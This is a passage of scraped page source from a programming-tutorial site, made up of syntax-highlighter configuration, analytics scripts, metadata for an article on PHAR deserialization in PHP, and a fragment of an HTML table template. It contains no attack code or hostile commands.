/jslib/syntaxhighlighter/scripts2022/shBrushHaxe.js' , 'java /jslib/syntaxhighlighter/scripts2022/shBrushJava.js' , 'jfx javafx /jslib/syntaxhighlighter/scripts2022/shBrushJavaFX.js' , 'js jscript javascript /jslib/syntaxhighlighter/scripts2022/shBrushJScript.js' , 'perl pl /jslib/syntaxhighlighter/scripts2022/shBrushPerl.js' , 'php /jslib/syntaxhighlighter/scripts2022/shBrushPhp.js' , 'text plain /jslib/syntaxhighlighter/scripts2022/shBrushPlain.js' , 'py python /jslib/syntaxhighlighter/scripts2022/shBrushPython.js' , 'ruby rails ror rb /jslib/syntaxhighlighter/scripts2022/shBrushRuby.js' , 'scala /jslib/syntaxhighlighter/scripts2022/shBrushScala.js' , 'sql /jslib/syntaxhighlighter/scripts2022/shBrushSql.js' , 'vb vbnet /jslib/syntaxhighlighter/scripts2022/shBrushVb.js' , 'ps powershell /jslib/syntaxhighlighter/scripts2022/shBrushPowerShell.js' , 'xml xhtml xslt html /jslib/syntaxhighlighter/scripts2022/shBrushXml.js' , 'go golang /jslib/syntaxhighlighter/scripts2022/shBrushGo.js' , 'json /jslib/syntaxhighlighter/scripts2022/shBrushJSON.js' , 'yml yaml /jslib/syntaxhighlighter/scripts2022/shBrushYaml.js' ); SyntaxHighlighter.all(); ( function () { var bp = document.createElement( 'script' ); var curProtocol = window.location.protocol.split( ':' )[0]; if (curProtocol === 'https' ) { } else { } var s = document.getElementsByTagName( "script" )[0]; s.parentNode.insertBefore(bp, s); })(); </script><script type= "text/javascript" src= "//icws.jb51.net/good2021/arc2019.js" ></script></p><div id= "tongji" > <script type= "text/javascript" src= "//icws.jb51.net/tongji/tongji.js" ></script> </div><p><script type= "text/javascript" src= "//cdn.staticfile.org/viewerjs/1.5.0/viewer.min.js" ></script><script type= "text/javascript" > if ( 'undefined' == typeof(window.Viewer)) { document.write(unescape( "%3Cscr" + "ipt src='/skin/js/viewer.min.js' type='text/javascript'%3E%3C/scr" + "ipt%3E" )); } var viewer = new Viewer(document.getElementById( 'content' )); ( function (){ var src = (document.location.protocol == "http:" ) ? "http://js.passport.qihucdn.com/11.0.1.js?d182b3f28525f2db83acfaaf6e696dba" : "https://jspassport.ssl.qhimg.com/11.0.1.js?d182b3f28525f2db83acfaaf6e696dba" ; document.write( '<scr' + 'ipt src="' + src + '" id="sozz"></scr' + 'ipt>' ); })(); </script><script src= "/skin/js/viewer.min.js" type= "text/javascript" ></script><script type= "text/javascript" >$( function (){$.get( "//www.2it.club/pl.asp?id=264624" );})</script><script type= "application/ld+json" > { "appid" : "1549322409310619" , "title" : "PHP开发技巧之PHAR反序列化详解" , "description" : "这篇文章主要为大家介绍了PHP开发技巧之PHAR反序列化详解,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步,早日升职加薪" , "pubDate" : "2022-10-10T09:56:20" , "upDate" : "2022-10-10T09:56:21" }</p> <p> </script><br> </p><table id= "table" class = "table table-bordered table-hover sm-font" ><thead><tr><th scope= "col" class = "text-center" > ' . htmlentities($func) . ' </th><th scope= "col" class = "text-center" >Opt</th></tr></thead> <tbody><tr><td class = "text-center" > ' . htmlentities($value) . ' </td><td class = "text-center" filename= "' . htmlentities($filename) . '" > <a href= "#" rel= "external nofollow" class = "download" >下载</a> / <a href= "#" rel= "external nofollow" class = "delete" >删除</a> </td></tr> </tbody> </table> </div> </div> |